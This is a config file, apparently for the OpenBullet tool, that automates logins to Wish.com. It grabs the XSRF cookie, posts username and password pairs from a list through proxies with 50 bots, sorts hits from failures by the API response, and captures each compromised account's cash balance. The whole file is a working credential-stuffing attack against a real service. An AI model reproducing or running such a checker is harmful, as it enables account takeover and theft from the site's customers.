[SETTINGS]
{
  "Name": "Wish.com",
  "SuggestedBots": 50,
  "LastModified": "2019-04-27T11:12:40.0398856+02:00",
  "AdditionalInfo": "",
  "Author": "Stephanny,
  "Version": "1.0.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.wish.com/" ReadResponseSource=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES(_xsrf)>" LR "" "" -> VAR "XSRF" 

REQUEST POST "https://www.wish.com/api/email-login" 
  CONTENT "email=<USER>&password=<PASS>&url=https%3A%2F%2Fwww.wish.com%2F&_buckets=&_experiments=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.wish.com" 
  HEADER "referer: https://www.wish.com/" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "x-xsrftoken: <XSRF>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"msg\": \"\", \"code\": 0, \"data" 
  KEYCHAIN Failure OR 
    KEY "Email or Password is incorrect" 

REQUEST GET "https://www.wish.com/menu" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "\"wish_cash_balance\": \"" "\"" -> CAP "Cash Balance" 

